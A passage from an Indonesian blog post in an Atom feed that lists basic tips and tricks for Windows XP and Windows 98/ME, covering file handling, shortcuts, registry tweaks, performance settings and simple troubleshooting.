Computer, pilih Properties. Buka tab General dan klik Advanced. Aktifkan option Encrypt contents to secure data.&lt;br /&gt;66. Cara termudah mengubah nama file atau folder adalah dengan memilihnya, kemudian menekan tombol F2.&lt;br /&gt;67. Supaya Anda bisa berpindah antar folder dengan cepat, terutama pada folder-folder yang sering dibuka, buatlah shortcut untuk setiap folder yang sering diakses.&lt;br /&gt;68. Reset file association dengan cara menhakan tombol Shift saat mengklik kanan sebuah file. Pilih Open With… Pilih program yang hendak Anda gunakan untuk membuka file tersebut dan enable option Open use the selected program to open this kind of file. Kemudian klik OK.&lt;br /&gt;69. Sesuaikan kapasitas penyimpanan file musik dengan cara membuka Windows Media Player dan memilih menu Tools|Options. Buka tab Copy Music dan sesuaikan ukuran kapasitas dengan menggeser slider.&lt;br /&gt;70. Jika Anda menyimpan semua dokumen dalam folder My Documents, maka semua file tersebut lebih mudah di-back-up serta tidak terpengaruh system restore.&lt;br /&gt;71. Jika sebuah file hasil copy dari CD tidak dapat diakses, maka hilangkan atribut Read only. Caranya, klik kanan file tersebut dan pilih Properties. Hilangkan tanda centang pada option Read only.&lt;br /&gt;72. Aturlah tampilan setiap folder dengan mengklik kanan folder tersebut pada My Computer. Pilih Properties dan klik Customize. Pilih template yang tersedia atau pilih gambar sesuai dengan keinginan Anda. Klik OK untuk menyimpan hasil setting.&lt;br /&gt;73. Anda bisa me-rename beberapa file sekaligus yang memiliki karakter sama dalam folder yang sama juga. Misalnya kumpulan foto atau image. Caranya, pilih semua file yang hendak di-rename, klik kanan file pertama dan klik Rename. Beri nama,misalnya Koleksi.JPG, maka semua file yang lain akan berubah namanya menjadi Koleksi (1).JPG, Koleksi (2).JPG, dan seterusnya.&lt;br /&gt;--&gt; STEP BY STEP&lt;br /&gt;74. Mengirim Faks Tahukah Anda, bahwa Windows XP memiliki tool untuk mengirim dan menerima faks?&lt;br /&gt;1. Buka Control Panel, pilih Add/Remove Program dan klik Add/Remove Windows Component. Enable Fax Services dan klik Next.&lt;br /&gt;2. Klik Start|All Programs|Accessories|Communication|Fax|Fax Console untuk menjalankan Fax Configuration Wizard. Atur semua setting, termasuk nomor faks dan modem yang digunakan serta pengaturan incoming fax.&lt;br /&gt;3. Buat semua faks dari Fax Console. Periksa semua isi sebelum dikirim, termasuk setting dan sebagainya.&lt;br /&gt;Mengatur Kualitas Cetak 75. Anda bisa mencetak beberapa foto bersamaan, sekaligus mengatur layout serta option lainnya dengan cara mudah. Pertama, buka file-file foto dalam folder My Pictures, kemudian pilih menu File |Print. Akan muncul Photo Printing Wizard. Atur printer yang hendak digunakan dan layout yang akan dipakai. Beberapa printer memungkinkan mencetak beberapa foto dalam satu kertas.&lt;br /&gt;76. Daripada harus mengatur setting printer setiap kali menggunakannya, buatlah copy printer Anda. Atur masing-masing dengan option berbeda sesuai yang Anda butuhkan.&lt;br /&gt;77. Anda bisa menggunakan karakter yang tidak ada di keyboard, namun bisa digunakan dalam Windows dengan fitur Character Map. Untuk membukanya, Anda bisa menemukan di Start|All Programs|Accessories|System Toolss|Character Map. Atau ketik “charmap” tanpa tanda petik di Start|Run.&lt;br /&gt;78. Untuk meng-capture sebuah adegan di file movie menjadi sebuah image, putarlah film tersebut dan tekan tombol Stop saat adegan yang diinginkan. Klik Take Picture, simpan di folder Anda dan beri nama.&lt;br /&gt;Memunculkan Penampakan Fitur Tersembunyi 79. Anda tertarik dengan musik pembuka Windows yang orisinal? Temukan file-nya di \windows\oobe\system32\images\tittle.wma.&lt;br /&gt;80. Ada dua edisi Windows Plus! yang beredar, yakni Microsoft Plus! for Windows dan Digital Media Edition (DME). Simak www.microsoft.com/windows/plus/PlusHome.asp dan coba versi trial DME.&lt;br /&gt;81. Ketikkan “iexpress” tanpa tanda petik pada kotak dialog Start|Run. Anda akan menemukan sebuah utility untuk mengompres dan membuat file self extraction.&lt;br /&gt;82. Anda akan menemukan beberapa tool yang kurang populer, namun punya kelebihan luar biasa. Tool-tool tersebut bisa ditemui di folder support\tools dalam CD instalasi Windows XP. Gunakan program suptools.msi untuk menginstalasi tool-tool tersebut dalam komputer Anda.&lt;br /&gt;83. Ada banyak wizard atau stepby-step di Windows. Untuk mengetahui wizard apa saja, buka Help and Support dan ketikkan “Wizard” tanpa tanda petik pada kolom pencarian. Windows akan memunculkan daftar wizard yang tersedia. Anda tinggal memilihnya.&lt;br /&gt;84. Untuk membuat karakter sendiri, klik Start|Run dan ketikkan Eudcedit. Buat sesuai keinginan Anda, asalakan masih dalam ukuran 64x64 grid. Simpan dengan memilih menu Edit|Save Character.&lt;br /&gt;85. Untuk meletakkan karakter dalam Character Map ke dalam dokumen, Anda cukup membuka Character Map dan memilih karakter tersebut. Kemudian Anda tinggal mengcopy dan paste-nya ke dalam dokumen Anda.&lt;br /&gt;Menghias Desktop 86. Anda bisa mengatur pointer mouse sesuai keinginan dengan membuka tab Pointer dalam menu Mouse di Control Panel. Klik Browse untuk mencari pointer yang sesuai keinginan Anda.&lt;br /&gt;87. Untuk menampilkan daftar dokumen yang terakhir diakses di Start Menu pada Windows XP Home Edition, klik kanan pada tombol Start dan pilih Properties. Klik Customize, buka tab Advanced dan enable option List my most recently opened documents.&lt;br /&gt;88. Jika Anda ingin agar tampilan Windows Explorer terbuka penuh hingga menutupi taskbar, tekan tombol F11.&lt;br /&gt;89. Anda bisa membuat shortcut key atau penekanan tombol tertentu untuk mengakses sebuah program. Caranya, klik kanan icon program tersebut dan pilih Properties. Buka tab Shortcut dan tentukan tombol mana yang Anda gunakan untuk mengakses program&lt;br /&gt;tersebut. Secara otomatis Windows akan menambahkan tombol Ctrl+Alt+ pilihan Anda sebagai shortcut key.&lt;br /&gt;90. Urutkan secara alfabet, semua program yang ada di Start Menu untuk memudahkan pengaksesan. Caranya, klik Start|All Programs, klik kanan salah satu program yang ada dan pilih Sort by Name.&lt;br /&gt;91. Munculkan penampakan icon indikator koneksi broadband atau dial-up pada system tray untuk mempermudah kontrol. Caranya, buka My Network Places, pilih View Networks Connections, klik kanan koneksi yang Anda gunakan dan pilih Properties. Ubah option Show icon in notofication area when connected menjadi enable.&lt;br /&gt;92. Anda bisa mengedit Start Menu sesuai dengan kebutuhan. Baik menambah, mengurangi, atau bahkan mengubah namanya. Caranya, klik kanan Start dan pilih Open atau Open All Users. Atur setiap shortcut yang tersedia sesuai kebutuhan.&lt;br /&gt;93. Anda bisa membuka beberapa program secara bersamaan dengan menekan tombol Shift, sementara mengklik program yang ada dalam Start Menu.&lt;br /&gt;94. Untuk menghilangkan nama icon pada desktop, klik kanan icon tersebut, dan pilih Rename. Tekan tombol Alt dan numeric key 255. Kemudan tekan Enter.&lt;br /&gt;95. Anda bisa menghilangkan tanda panah pada icon shortcut di desktop. Caranya, masuk ke registry editor dengan mengetik “regedit” tanpa tanda petik di kotak dialog Start|Run. Masuk ke dalam direktori HKEY_CLASSES_ROOT\Lnkfile. Hapus value IsShortcut. 85&lt;br /&gt;--&gt; TOP TIPS !&lt;br /&gt;96. Daftar Shortcut Berikut ini beberapa shortcut yang paling banyak digunakan saat bekerja sehari-hari menggunakan Windows.&lt;br /&gt;[Windows] + [L] Lock komputer [Windows] + [U] Menampilkan Utility Manager [Windows] + [R] Menampilkan Run [Windows] + [F] Menampilkan window pencarian [Windows] + [E] Membuka My Computer [Windows] + [D] Mematikan atau mengaktifkan Toggle Desktop [Windows] + [M] Minimize semua window [Windows] + [Shift] + [M] Restore semua window yang di-minimize [Windows] + [Ctrl] + [F] Mencari komputer dalam jaringan [Windows] + [F1] Menampilkan halaman Help [Windows] + [Break] Memunculkan window System&lt;br /&gt;Properties [Windows] + [Tab] Scroll tombol di Taskbar Jika Anda menggunakan keyboard lama yang tidak dilengkapi dengan tombol Windows, gunakan paduan tombol Ctrl + Esc.&lt;br /&gt;97. Anda bisa meng-enable atau disable grouping beberapa file dalam satu program. Caranya, klik kanan taskbar dan pilih Properties. Beri atau hilangkan tanda centang pada option Groups similar taskbar button.&lt;br /&gt;98. Anda bisa menghilangkan atau menampilkan icon di desktop dengan mengklik kanan desktop dan memilih Arrange Icons By|Show Desktop Icons.&lt;br /&gt;99. Anda bisa membuat custom toolbar dengan mengklik kanan taskbar, memilih Toolbars|New Toolbar. Atur sesuai dengan keinginan Anda, misalnya menjadikan My Documents sebagai toolbar di taskbar supaya mudah dan cepat diakses.&lt;br /&gt;100. Klik kanan Start Menu, pilih Properties, jika tidak menggunakan Classic Start Menu, klik Customize dan buka tab Advanced. Ada beberapa munu yang bisa diaktifkan dengan memberi tanda centang pada option yang ada. Mulai dari Scroll Programs hingga memunculkan penampakan beberapa fitur dalam Start Menu. 101. Anda bisa membuka sebuah situs tanpa membuka browser terlebih dahulu. Caranya, ketikkan alamat lengkap situs yang hendak dibuka di kotak dialog Start|Run. Misalnya www.pcmedia.co.id. Kemudian tekan Enter.&lt;br /&gt;102. Di setiap menu dalam Windows terdapat huruf yang bergaris bawah sebagai patokan penggunaan navigasi keyboard. Misalnya menu File bisa dibuka dengan menekan tombol Alt+F. Anda bisa menonaktifkan atau mengaktifkan fitur yang ditandai dengan garis bawah ini. Caranya, klik kanan area kosong di desktop. Kemudian buka tab Appereance, dan klik tombol effects. Atur tanda centang pada option Hide underlined letter for keyboard navigation until I press the [Alt] key.&lt;br /&gt;103. Atur supaya komputer mengeluarkan suara peringatan saat tombol Caps Lock, Num Lock atau Scroll Lock diaktifkan. Caranya, Buka Control Panel, masuk dalam Accessibility Option. Buka tab Keyboard dan enable option Use Toggle-Keys.&lt;br /&gt;104. Untuk meng-enable Hibernate dalam Windows XP saat menekan Turn Off di Start Menu, tahan tombol Shift. Maka tombol Stand by pada kotak dialog Shut Down akan berubah menjadi Hibernate.&lt;br /&gt;105. Jika hardware Anda support Hibernate, aktifkan segera fitur ini. Caranya, buka Control Panel dan buka Power Options. Klik tab Hibernate dan beri tanda centang pada option Enable Hibernate. Jika hardware Anda tidak support Hibernate, tab ini tidak bisa ditemui.&lt;br /&gt;Memperbaiki Kinerja Komputer 106. Tambah kecepatan komputer Anda dengan menghilangkan penampakan yang bagus namun memakan banyak waktu, yakni animasi. Caranya, buka Control Panel, dan klik ganda System. Klik tab Advanced dan tekan tombol Performance Settings. Kemudian enable option Adjust for the best performance.&lt;br /&gt;107. Untuk mengurangi waktu booting yang terasa lama, atur di BIOS agar booting dimulai dari harddisk baru kemudian CD atau floppy drive pada pilihan berikutnya.&lt;br /&gt;108. Atur supaya Windows hanya akan me-load program yang dibutuhkan saja saat mulai berjalan supaya waktu loading lebih cepat dan kerja komputer lebih ringan. Ketikkan “msconfig” tanpa tanda petik di kotak dialog Run dan tekan Enter. Pada tab General, pilih option Selective Startup, kemudian buka tab Startup dan nonaktifkan semua program yang tidak perlu.&lt;br /&gt;109. Anda bisa memonitor penggunaan processor dengan menekan tombol Ctrl+Alt+Del untuk membuka Task Manager. Kemudian minimize window tersebut, Anda akan melihat grafik penggunaan kapasitas processor di system tray.&lt;br /&gt;110. Untuk meningkatkan kecepatan menyimpan data di USB ZIP drive, buka My Computer dan klik kanan drive ZIP tersebut. Pilih Properties, buka tab Hardware klik Properties, kemudian buka tab Policies dan aktifkan option Optimize for Performance.&lt;br /&gt;111. Untuk mempercepat tampilan Start Menu, buka Registry Editor (ketikkan “regedit” tanpa tanda petik di kotak dialog Run). Masuk dalam direktori HKEY_CURRENT_USER\Control Panel\Desktop. Klik ganda value yang bernama MenuShowDelay, ganti angka yang ada menjadi 100. Dengan cara ini, maka delay tampilan Start Menu semakin singkat.&lt;br /&gt;112. Ada cara cepat mematikan komputer. Tekan tombol Ctrl+Alt+Del, pada windows Task Manager yang muncul, tekan menu Shut Down dan tahan tombol Ctrl saat mengklik Turn Off. Pastikan dulu semua dokumen telah di-save.&lt;br /&gt;113. Anda bisa melihat grafis yang menampilkan performance komputer berdasarkan beberapa indikator. Misalnya penggunaan processor, memory, dan lain sebagainya. Caranya, buka Control Panel dan klik ganda Administrative Tools. Buka fitur Performance.&lt;br /&gt;114. Anda juga bisa menambahkan beberapa indikator lain dalam fitur Performance (di nomer 13) dengan mengklik icon + dan memilih indikator baru apa saja yang hendak ditampilkan.&lt;br /&gt;115. Anda bisa menggabungkan sebuah file registry atau .reg ke dalam registry Windows Anda, dengan mengklik ganda file tersebut. Untuk mengetahui fungsinya, buka dengan notepad.&lt;br /&gt;116. Jika Anda menggunakan RAM sebesar 512 MB, atur agar Windows tidak membuat paging ke disk agar performance komputer semakin meningkat. Caranya, buka Registry Editor dan masuk dalam direktory HKEY_LOCAL_MACHINE\SYSTEM|Current ControlSet\Control\SessionManager\MemoryManagement. Ubah value DisablePagingExecutive menjadi 1.&lt;br /&gt;117. Gunakan Bootcfg.exe untuk mengedit boot.ini Windows XP. Caranya, ketikkan “cmd” tanpa tanda petik dalam kotak dialog Run untuk masuk dalam DOS Prompt, dan ketikkan bootcfg: /? setelah muncul prompt untuk memperoleh informasi mengenai fitur dalam program ini.&lt;br /&gt;118. Untuk memilih operating system dalam yang digunakan dalam sebuah komputer yang memiliki partisi drive, buka Control Panel, masuk dalam System kemudian buka tab Advanced. Klik tombol Startup and Recovery Setting kemudian Edit.&lt;br /&gt;119. Gunakan utility klasik chkdsk untuk men-scan harddisk dan memperbaiki error yang ditemui. Caranya, klik Start |Run dan ketikkan “chkdsk c:/f” tanpa tanda petik untuk men-scan dan memperbaiki drive C. Jika Anda ingin tahu lebih banyak tentang fitur dalam chkdsk, ketikkan “chkdsk /?”. 120. Anda bisa melewati Scanner and Camera Wizard saat memasang kamera digital. Untuk mengaksesnya, gunakan Windows Explorer atau My Computer. Kamera digital Anda akan tampil sebagai drive.&lt;br /&gt;121. Ada utility dalam Windows XP Pro Edition yang jarang digunakan, yakni gpedit. Jalankan utility ini dengan mengetikkan “gpedit.msc” tanpa tanda petik di kotak dialog Run dan tekan Enter. Utility ini bisa digunakan untuk setiap tool dan komponen yang ada di Windows. Coba satu per satu setting yang Anda inginkan kemudian perhatikan hasilnya.&lt;br /&gt;-&gt; STEP BY STEP&lt;br /&gt;122 .Mengatur Jadwal Perawatan Daripada bersusah payah membersihkan sampah di Windows, atur agar Windows membersihkan dirinya sendiri secara berkala dengan Schedule Task.&lt;br /&gt;1. Untuk mengatur jadwal perawatan Windows secara berkala, buka Control Panel, klik ganda Scheduled Tasks. Tambahkan Scheduled Task melalui wizard. Klik Next untuk masuk dalam list berisi program yang bisa dijadwalkan.&lt;br /&gt;2. Jika tool yang hendak Anda jadwalkan tidak tertera pada list, klik Browse dan arahkan ke folder tempat tool yang Anda maksud berada. Kebanyakan tool Windows berada dalam folder Windows\system32. Pilih salah satu dan klik Open.&lt;br /&gt;3. Ketik nama task tersebut dan tentukan tingkat keseringan atau frekuensi jadwal program tersebut. Klik Next, atur setting lain yang diperlukan dan tambahkan username beserta password untuk mengamankan Schedule Task.&lt;br /&gt;123. Gunakan utility gratis PowerToys dari www.microsoft.com/windowsxp/home/downloads/powertoys.asp yang sangat berguna. PowerToys sendiri terdiri dari beberapa program, di antaranya Open Command Window Here, Alt-Tab Replacement, Tweak UI, Power Calculator, Image Resizer, CD Slide Show Generator, Virtual Desktop Manager,Taskbar Magnifier, HTML Slide Show Wizard, dan Webcam Timershot.&lt;br /&gt;124. Windows Anda bisa memperoleh tambahan kecepatan jika Indexing Service dinonaktifkan. Caranya mudah, buka Administrative Tools di Control Panel, pilih Services dan disable Indexing Service.&lt;br /&gt;125. Kembangkan kapasitas harddisk dengan menggunakan Disk Cleanup. Buka My Computer, klik kanan drive yang ada dan pilih Properties. Buka tab General dan klik tombol Disk Cleanup. Bersihkan semua file sampah tersebut, termasuk mengosongkan isi Recycle Bin dari semua data yang sudah tidak digunakan lagi.&lt;br /&gt;126. Hilangkan semua shortcut di folder Startup dalam Start Menu. Sebab, program yang memiliki shortcut dalam folder ini secara otomatis akan dieksekusi saat kali pertama Windows dijalankan.&lt;br /&gt;127. Periksa setting messenger yang ada dalam komputer Anda, karena hampir setiap messenger akan me-load dirinya sendiri secara otomatis setiap kali Windows dijalankan. Usahakan agar option Automatically Login atau Load at Windows Start tidak aktif.&lt;br /&gt;128. Anda bisa mengakses setiap program secara langsung dengan mengetikkan nama programnya di kotak dialog Run. Misalnya calc untuk kalkulator, winword untuk Microsoft Word, dan lain sebagainya.&lt;br /&gt;Troubleshooting Sederhana 129. Jika saat defrag tiba-tiba komputer berhenti, restart dan masuk dalam Safe Mode dengan menekan tombol F8 sesaat sebelum Windows mulai berjalan. Defrag lagi harddisk Anda dari mode ini.&lt;br /&gt;130. Cari tahu apakah drive Anda FAT atau NTFS dengan mengklik kanan drive tersebut dan memilih Properties kemudian masuk ke tab General. Baca detail file system pada kotak dialog yang muncul.&lt;br /&gt;131. Ubah sebuah drive dalam format FAT menjadi NTFS melalui DOS dengan perintah convert c:/FS:NTFS. Masuklah dalam registry editor dan buka direktori HKEY_USERS\DEFAULT\Control Panel\Desktop dan buat value dalam AutoEndTask dengan nilai 1.&lt;br /&gt;133. Jika saat menginstal sebuah driver baru komputer hang, restore komputer ke konfigurasi sebelumnya. Caranya, restart komputer dan tekan F8 untuk masuk ke Safe Mode dan pilih option Last Known Good Configuration.&lt;br /&gt;134. Gunakan Event Viewer untuk melacak aplikasi yang error. Caranya, klik kanan My Computer, pilih Manage dan klik event Viewer. Klik ganda setiap aplikasi atau system yang menunjukkan error untuk melihat informasi kesalahan.&lt;br /&gt;135. Ada cara paling tepat untuk mengatur ketepatan jam di komputer. Klik ganda jam di sebelah kanan bawah layar atau di system tray, pilih tab Internet Time. Aktifkan option Automatically synchronize with an Internet time server. Pilih server yang tersedia dan klik Update Now!&lt;br /&gt;Tip dan Trik Spesial untuk Windows 98 dan ME 136. Back-up setting dial-up dengan cara men-drag and drop file koneksi di folder Dial Up Networking ke sebuah floppy drive. File back-up akan disimpan dalam ekstensi.dun.&lt;br /&gt;137. Cara cepat restart, tekan Start|Shut Down|Restart, sementara klik OK, tahan tombol Shift.&lt;br /&gt;138. Gunakan Tweak UI khusus Windows 98 dari www.microsoft.com/ntworkstation/downloads/powertoys/networking/nttweakui.asp. Setelah instalasi selesai, buka Tweak UI melalui Control Panel.&lt;br /&gt;139. Gunakan tombol F3 untuk membuka fitur Find saat berada di Windows Explorer atau desktop.&lt;br /&gt;140. Atur koneksi dial-up dengan Telephony Location Manager. Fitur Telephony Location Manager ini akan membantu Anda mengoptimalkan koneksi dial-up. Caranya, klik Start|Run dan ketikkan “tlocmgr” tanpa tanda kutip.&lt;br /&gt;141. Jika komputer Anda tidak bisa di-set Dalam mode standby atau suspended, maka perbaiki dengan Pmtshoot dari http://support.microsoft.com/?kbid=185949.&lt;br /&gt;142. Selalu back-up registry sebelum melakukan perubahan di dalamnya. Caranya, gunakan Registry Checker yang bisa ditemui di Start|Programs| Accessories|System Tools|Tools.&lt;br /&gt;143. Buat sebuah disket bootable untuk Windows 98 dengan cara memformatnya menggunakan system files. Kemudian copy file c:\windows\command\scanreg.exe dan c:\windows\himem.sys ke dalam disket tersebut. Jangan lupa, edit file config.sys yang berada di disket dengan memberi tambahan baris “device =a:\himem.sys” tanpa tanda kutip.&lt;br /&gt;144. Untuk me-restore registry saat komputer tidak mau berjalan, coba booting dengan boot disk. Kemudian masuk ke drive C:\ dan ketikkan “scanreg\restore”, tanpa tanda kutip. Ikuti angkah-langkahnya hingga selesai. Kemudian keluar dari DOS.&lt;br /&gt;145. Tambahkan shortcut Control Panel ke Start Menu dengan mengklik kanan tombol Start dan klik Open. Kemudian klik kanan di area kosong, pilih New|Folder. Isikan “Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}” tanpa tanda kutip dan tekan Enter.&lt;br /&gt;146. Anda bisa menghilangkan kotak dialog password yang muncul kali pertama sebelum masuk dalam Windows. Caranya, masuk ke Control Panel, buka Password dan buka tab Change Password. Isi kolom password lama dengan password yang Anda miliki, dan kosongkan kolom new password. Setelah itu, klik tab User Profiles dan enable option All users of this PC use the same preferences and desktop settings. Perubahan ini akan berjalan setelah Windows di-restart.&lt;br /&gt;147. Untuk membatalkan perintah Print, buka icon Printer di system tray dengan mengklik ganda. Kemudian sorot file yang sedang di-print pada Window Printer dan klik kanan kemudian Cancel.&lt;br /&gt;148. Temukan tool-tool under DOS yang masih layak dipergunakan dalam folder tools\MSDOS di CD Instalasi Windows 98.&lt;br /&gt;149. Jika Windows 98 atau Me berjalan lambat, periksa memory. Caranya, klik kanan My Computer dan pilih Properties. Buka tab Performance dan lihat System Resource. Jika mencapai 80 persen, restart komputer. Ingat, tutup semua program sebelum melihat System Resource.&lt;br /&gt;150. Gunakan Sysedit untuk mengedit file-file system. Misalnya Autoexec.bat dan sebagainya. Ketikkan “sysedit” di kotak dialog Run tanpa diberi tanda petik.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8591117055296439835-7315007311994683873?l=enaq.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='related' href='http://defidz.tblog.com' title='150 tips dan trik dasar Windows'/><link rel='replies' type='application/atom+xml' href='http://enaq.blogspot.com/feeds/7315007311994683873/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8591117055296439835&amp;postID=7315007311994683873' title='1 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8591117055296439835/posts/default/7315007311994683873'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8591117055296439835/posts/default/7315007311994683873'/><link rel='alternate' type='text/html' href='http://enaq.blogspot.com/2008/03/150-tips-dan-trik-dasar-windows-setelah.html' title='150 tips dan trik dasar Windows'/><author><name>Deni's Blog</name><uri>http://www.blogger.com/profile/08351452297355526383</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='11' src='http://bp0.blogger.com/_ODxpL5cDIW8/R_GyiGm5q3I/AAAAAAAAACg/cN72rF5eUzo/S220/08012006(004)_filtered.jpg'/></author><thr:total>1</thr:total></entry></feed>
